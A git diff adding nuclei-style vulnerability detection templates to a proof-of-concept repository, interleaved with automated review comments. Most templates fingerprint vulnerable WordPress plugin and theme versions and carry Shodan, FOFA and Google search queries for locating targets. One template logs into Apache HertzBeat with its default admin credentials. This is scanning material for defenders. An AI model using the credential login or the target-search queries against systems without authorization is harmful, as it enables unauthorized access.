diff --git a/date.txt b/date.txt
index 7036fab477..42eedaf32c 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240831
+20240901
diff --git a/poc.txt b/poc.txt
index 686feab606..9a8a68cc29 100644
--- a/poc.txt
+++ b/poc.txt
@@ -2600,6 +2600,7 @@
 ./poc/auth/dbeaver-credentials-6781.yaml
 ./poc/auth/dbeaver-credentials-6782.yaml
 ./poc/auth/dbeaver-credentials.yaml
+./poc/auth/default-cred-hertzbeat.yaml
 ./poc/auth/dell-emc-ecom-default-credentials-6917.yaml
 ./poc/auth/dell-emc-ecom-default-credentials.yaml
 ./poc/auth/dell-idrac-default-login-6942.yaml
@@ -21643,6 +21644,7 @@
 ./poc/cve/CVE-2022-4099-efabe65e0636127b900f654341e2d21b.yaml
 ./poc/cve/CVE-2022-4099.yaml
 ./poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml
+./poc/cve/CVE-2022-4100.yaml
 ./poc/cve/CVE-2022-4101-ff9c428babf09501938ec8b47a7ff0b5.yaml
 ./poc/cve/CVE-2022-4101.yaml
 ./poc/cve/CVE-2022-4102-211a125e03141593ca6a2a03eab40ec0.yaml
@@ -22365,6 +22367,7 @@
 ./poc/cve/CVE-2022-45359-b36586431dff2aad1fae7b081e9eb505.yaml
 ./poc/cve/CVE-2022-45359.yaml
 ./poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml
+./poc/cve/CVE-2022-4536.yaml
 ./poc/cve/CVE-2022-45360-207ef17540c22dd0793408d606b91bda.yaml
 ./poc/cve/CVE-2022-45360.yaml
 ./poc/cve/CVE-2022-45361-aa79324e8a1a2b2db7d009a7aa76d972.yaml
@@ -22404,6 +22407,7 @@
 ./poc/cve/CVE-2022-45377-f99be6f5db095fa34ac8836d9c3bf756.yaml
 ./poc/cve/CVE-2022-45377.yaml
 ./poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml
+./poc/cve/CVE-2022-4539.yaml
 ./poc/cve/CVE-2022-4542-f62d4c5bcf581eb4208970f7bf92c622.yaml
 ./poc/cve/CVE-2022-4542.yaml
 ./poc/cve/CVE-2022-4544-4a43b5c1e9b5ac07f83a1ad6288e2487.yaml
@@ -39501,6 +39505,7 @@
 ./poc/cve/CVE-2024-3885-9e0a7124350833ada45c8c2089abea17.yaml
 ./poc/cve/CVE-2024-3885.yaml
 ./poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml
+./poc/cve/CVE-2024-3886.yaml
 ./poc/cve/CVE-2024-3887-c69a35937d64f9aabf71399960d846ed.yaml
 ./poc/cve/CVE-2024-3887.yaml
 ./poc/cve/CVE-2024-3888-73a7dff9e7fc032d9c7b3504d9e32105.yaml
@@ -40923,6 +40928,7 @@
 ./poc/cve/CVE-2024-5039.yaml
 ./poc/cve/CVE-2024-5041-683fbe7656aac22ccbf1456af0532a73.yaml
 ./poc/cve/CVE-2024-5041.yaml
+./poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml
 ./poc/cve/CVE-2024-5057-b5cd1f63e71feb762d09590f74da1942.yaml
 ./poc/cve/CVE-2024-5057.yaml
 ./poc/cve/CVE-2024-5058-63a03ea4af4d1f6d04449e3cd1d991f1.yaml
@@ -41022,6 +41028,7 @@
 ./poc/cve/CVE-2024-5207-dfe92838983c441ca6954031b5866f4e.yaml
 ./poc/cve/CVE-2024-5207.yaml
 ./poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml
+./poc/cve/CVE-2024-5212.yaml
 ./poc/cve/CVE-2024-5215-0170d5acc9b537b31bb3fad32634325d.yaml
 ./poc/cve/CVE-2024-5215.yaml
 ./poc/cve/CVE-2024-5217.yaml
@@ -42166,6 +42173,7 @@
 ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml
 ./poc/cve/CVE-2024-7422.yaml
 ./poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml
+./poc/cve/CVE-2024-7435.yaml
 ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml
 ./poc/cve/CVE-2024-7447.yaml
 ./poc/cve/CVE-2024-7484-5be14b55ae30eebe36f1e5fcad1d160a.yaml
@@ -42242,6 +42250,7 @@
 ./poc/cve/CVE-2024-7703-7d232ae776193850ef9d74eec7d98698.yaml
 ./poc/cve/CVE-2024-7703.yaml
 ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml
+./poc/cve/CVE-2024-7717.yaml
 ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml
 ./poc/cve/CVE-2024-7775.yaml
 ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml
@@ -42315,6 +42324,7 @@
 ./poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml
 ./poc/cve/CVE-2024-8091.yaml
 ./poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml
+./poc/cve/CVE-2024-8108.yaml
 ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml
 ./poc/cve/CVE-2024-8120.yaml
 ./poc/cve/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml
@@ -42330,6 +42340,7 @@
 ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml
 ./poc/cve/CVE-2024-8274.yaml
 ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
+./poc/cve/CVE-2024-8276.yaml
 ./poc/cve/CVE-2024-8319-f52695adcae621062e419e0168d0ec9c.yaml
 ./poc/cve/CVE-2024-8319.yaml
 ./poc/cve/CVE_2023_49442.yaml
@@ -50308,6 +50319,7 @@
 ./poc/default/default-config-6835.yaml
 ./poc/default/default-config-6836.yaml
 ./poc/default/default-config.yaml
+./poc/default/default-cred-hertzbeat.yaml
 ./poc/default/default-detect-generic-6837.yaml
 ./poc/default/default-detect-generic-6838.yaml
 ./poc/default/default-detect-generic-6839.yaml
@@ -64212,6 +64224,7 @@
 ./poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml
 ./poc/other/attire-blocks-4d0bda665c71d62ec3979730095585b3.yaml
 ./poc/other/attire-blocks.yaml
+./poc/other/attire.yaml
 ./poc/other/attorney-75ae42f95c5029a5c34276ce81634c4d.yaml
 ./poc/other/attorney-9c2d3a40daf25f855f3ce9f2c18eba21.yaml
 ./poc/other/attorney.yaml
@@ -73143,6 +73156,7 @@
 ./poc/other/fluent-security-2950b8c12fea2a10540f20704f5aa9d1.yaml
 ./poc/other/fluent-security.yaml
 ./poc/other/fluent-support.yaml
+./poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml
 ./poc/other/fluentform-1a2efa41a2d05e264321477edc4bb700.yaml
 ./poc/other/fluentform-359dafd9ea2acf47f5a3f1c1b3277d92.yaml
 ./poc/other/fluentform-42675b86d66431173f7276d369b78de4.yaml
@@ -114674,6 +114688,7 @@ ./poc/wordpress/wp-events-939c8e41990e721256330f6828258871.yaml ./poc/wordpress/wp-events-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml +./poc/wordpress/wp-events-manager.yaml ./poc/wordpress/wp-events-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-events-plugin.yaml ./poc/wordpress/wp-events.yaml diff --git a/poc/auth/default-cred-hertzbeat.yaml b/poc/auth/default-cred-hertzbeat.yaml new file mode 100644 index 0000000000..c332a19d4d --- /dev/null +++ b/poc/auth/default-cred-hertzbeat.yaml @@ -0,0 +1,33 @@ +id: apache-hertzbeat-default-login + +info: + name: Apache HertzBeat Default Credentials + author: securitytaters + severity: high + description: Apache HertzBeat enables default admin credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/hertzbeat?tab=readme-ov-file#1install-quickly-via-docker + tags: hertzbeat,default-login + +variables: + username: admin + password: hertzbeat + +http: + - raw: + - |- + POST /api/account/auth/form HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":0,"identifier":"{{username}}","credential":"{{password}}"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"token":"eyJ' + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2022-4100.yaml b/poc/cve/CVE-2022-4100.yaml new file mode 100644 index 0000000000..694c56c6e8 --- /dev/null +++ b/poc/cve/CVE-2022-4100.yaml 
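Review bot: This template is added twice with the same blob (`index 0000000000..c332a19d4d`): here as poc/auth/default-cred-hertzbeat.yaml and again further down as poc/default/default-cred-hertzbeat.yaml, both carrying `id: apache-hertzbeat-default-login`, so a run over the repository reports every hit twice and nuclei may warn about the duplicate id; keep one copy and let the poc.txt index point at it. The `id` also does not match the file name, whereas every CVE template in this commit names the file after its `id`. The `'"token":"eyJ'` word match assumes compact JSON; if the response is ever pretty-printed the check silently misses, so a regex matcher such as `- type: regex` / `regex:` / `- '"token"\s*:\s*"eyJ'` would be more robust — I have not confirmed HertzBeat's response formatting, so treat that as a suggestion to verify.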
@@ -0,0 +1,59 @@ +id: CVE-2022-4100 + +info: + name: > + WP Cerber Security <= 9.4 - IP Protection Bypass + author: topscoder + severity: medium + description: > + The WP Cerber Security plugin for WordPress is vulnerable to IP Protection bypass in versions up to, and including 9.4 due to the plugin improperly checking for a visitor's IP address. This makes it possible for an attacker whose IP address has been blocked to bypass this control by setting the X-Forwarded-For: HTTP header to an IP Address that hasn't been blocked. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4100 + metadata: + fofa-query: "wp-content/plugins/wp-cerber/" + google-query: inurl:"/wp-content/plugins/wp-cerber/" + shodan-query: 'vuln:CVE-2022-4100' + tags: cve,wordpress,wp-plugin,wp-cerber,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-cerber/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-cerber" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.4') \ No newline at end of file diff --git a/poc/cve/CVE-2022-4536.yaml b/poc/cve/CVE-2022-4536.yaml new file mode 100644 index 0000000000..8115625b5d --- /dev/null +++ b/poc/cve/CVE-2022-4536.yaml 
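Review bot: `name: >` is a clipped folded scalar, so the template name is stored with a trailing newline; `name: >-` (and `description: >-`) strips it, which matters when the name is printed on a single line in scan output. The two `regex` extractors are byte-identical apart from `internal: true`; if your nuclei version exposes named non-internal extractors to `dsl`, the second copy is redundant, otherwise the duplication deserves a comment saying why both are needed. The matcher only fingerprints `Stable tag` from readme.txt, so a hit means "a version in the affected range is advertised", not "bypass confirmed"; a one-line comment above `matchers:` stating that would stop readers over-reading a result. The file also ends without a trailing newline (`\ No newline at end of file`). The same points apply to CVE-2022-4536.yaml, CVE-2022-4539.yaml, CVE-2024-3886.yaml, CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml, CVE-2024-5212.yaml, CVE-2024-7435.yaml, CVE-2024-7717.yaml, CVE-2024-8108.yaml and CVE-2024-8276.yaml in this diff.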
@@ -0,0 +1,59 @@ +id: CVE-2022-4536 + +info: + name: > + IP Vault – WP Firewall <= 1.1 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: medium + description: > + The IP Vault – WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66e89753-f83e-4e60-b165-6d3d101d6c59?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4536 + metadata: + fofa-query: "wp-content/plugins/ip-vault-wp-firewall/" + google-query: inurl:"/wp-content/plugins/ip-vault-wp-firewall/" + shodan-query: 'vuln:CVE-2022-4536' + tags: cve,wordpress,wp-plugin,ip-vault-wp-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-vault-wp-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-vault-wp-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2022-4539.yaml b/poc/cve/CVE-2022-4539.yaml new file mode 100644 index 0000000000..176a980d1b --- /dev/null +++ b/poc/cve/CVE-2022-4539.yaml 
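Review bot: The description contains a doubled word, "supply the X-Forwarded-For header with with a different IP Address", and the identical sentence is copied into CVE-2022-4539.yaml below. Since the template ships its own description text, fix it in both: `Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged …`.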
@@ -0,0 +1,59 @@ +id: CVE-2022-4539 + +info: + name: > + Web Application Firewall <= 2.1.2 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: medium + description: > + The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e99531c-8742-4f91-8525-65bb3cb06644?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4539 + metadata: + fofa-query: "wp-content/plugins/web-application-firewall/" + google-query: inurl:"/wp-content/plugins/web-application-firewall/" + shodan-query: 'vuln:CVE-2022-4539' + tags: cve,wordpress,wp-plugin,web-application-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/web-application-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "web-application-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3886.yaml b/poc/cve/CVE-2024-3886.yaml new file mode 100644 index 0000000000..f819944536 --- /dev/null +++ b/poc/cve/CVE-2024-3886.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-3886 + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_check_envato_code function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-3886 + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:CVE-2024-3886' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml b/poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml new file mode 100644 index 0000000000..e37b8d91ae --- /dev/null 
+++ b/poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.18 - Missing Authorization to Authenticated (Subscriber+) Mailchimp Integration Modification + author: topscoder + severity: low + description: > + The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized Malichimp API key update due to an insufficient capability check on the verifyRequest function in all versions up to, and including, 5.1.18. This makes it possible for Form Managers with a Subscriber-level access and above to modify the Mailchimp API key used for integration. At the same time, missing Mailchimp API key validation allows the redirect of the integration requests to the attacker-controlled server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 4.2 + cve-id: CVE-2024-5053 + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:CVE-2024-5053' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.18') \ No newline at end of file 
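Review bot: `severity: low` and the `low` tag disagree with the template's own `cvss-score: 4.2`, which sits in the CVSS medium band (4.0–6.9); one of the two should change, e.g. `severity: medium` and `tags: cve,wordpress,wp-plugin,fluentform,medium`. The same mismatch is larger in CVE-2024-7435.yaml and CVE-2024-7717.yaml (`low` against 8.8, the high band) and recurs in CVE-2024-8108.yaml and CVE-2024-8276.yaml (`low` against 6.4). Anyone filtering a scan with `-severity` will skip these templates on the basis of the wrong field. The description also misspells "Malichimp" for "Mailchimp".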
diff --git a/poc/cve/CVE-2024-5212.yaml b/poc/cve/CVE-2024-5212.yaml new file mode 100644 index 0000000000..5e3a0e5e7b --- /dev/null +++ b/poc/cve/CVE-2024-5212.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5212 + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db95415a-5354-498b-8368-58c47d9948de?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-5212 + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:CVE-2024-5212' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file 
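Review bot: The `name` is identical to CVE-2024-3886.yaml's — same product, same `<= 5.0`, same `envato_code[]` parameter — while the description points at a different function (`on_ajax_register_forum_user`); confirm against the Wordfence reference whether the parameter really is the same or the name was copied over unchanged. The request, extractors and matchers are also byte-identical to CVE-2024-3886.yaml, so any host matched by one is matched by the other; if that is intended, a comment noting that the two CVEs share one version fingerprint would save the next reader a diff.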
diff --git a/poc/cve/CVE-2024-7435.yaml b/poc/cve/CVE-2024-7435.yaml new file mode 100644 index 0000000000..f94424cd5d --- /dev/null +++ b/poc/cve/CVE-2024-7435.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7435 + +info: + name: > + Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Attire theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.6 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7435 + metadata: + fofa-query: "wp-content/themes/attire/" + google-query: inurl:"/wp-content/themes/attire/" + shodan-query: 'vuln:CVE-2024-7435' + tags: cve,wordpress,wp-theme,attire,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/attire/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "attire" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-7717.yaml b/poc/cve/CVE-2024-7717.yaml new file mode 100644 index 0000000000..1d2a396e1c --- /dev/null +++ b/poc/cve/CVE-2024-7717.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7717 + +info: + name: > + WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + The WP Events Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter in all versions up to, and including, 2.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7717 + metadata: + fofa-query: "wp-content/plugins/wp-events-manager/" + google-query: inurl:"/wp-content/plugins/wp-events-manager/" + shodan-query: 'vuln:CVE-2024-7717' + tags: cve,wordpress,wp-plugin,wp-events-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-events-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.11') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8108.yaml b/poc/cve/CVE-2024-8108.yaml new file mode 100644 index 0000000000..80547d4de2 --- /dev/null +++ b/poc/cve/CVE-2024-8108.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8108 + +info: + name: > + Share This Image <= 2.01 - Authenticated (Contributor+) Stored Cross-Site Scripting via alignment Parameter + author: topscoder + severity: low + description: > + The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alignment' parameter in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8108 + metadata: + fofa-query: "wp-content/plugins/share-this-image/" + google-query: inurl:"/wp-content/plugins/share-this-image/" + shodan-query: 'vuln:CVE-2024-8108' + tags: cve,wordpress,wp-plugin,share-this-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/share-this-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "share-this-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.01') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8276.yaml b/poc/cve/CVE-2024-8276.yaml new file mode 100644 index 0000000000..80bc70f361 --- /dev/null +++ b/poc/cve/CVE-2024-8276.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8276 + +info: + name: > + WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The WPZOOM Portfolio Lite – Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘align’ attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8276 + metadata: + fofa-query: "wp-content/plugins/wpzoom-portfolio/" + google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/" + shodan-query: 'vuln:CVE-2024-8276' + tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpzoom-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index fda684a006..e714f96cca 100644 --- a/poc/cve/cve-2008-5587.yaml 
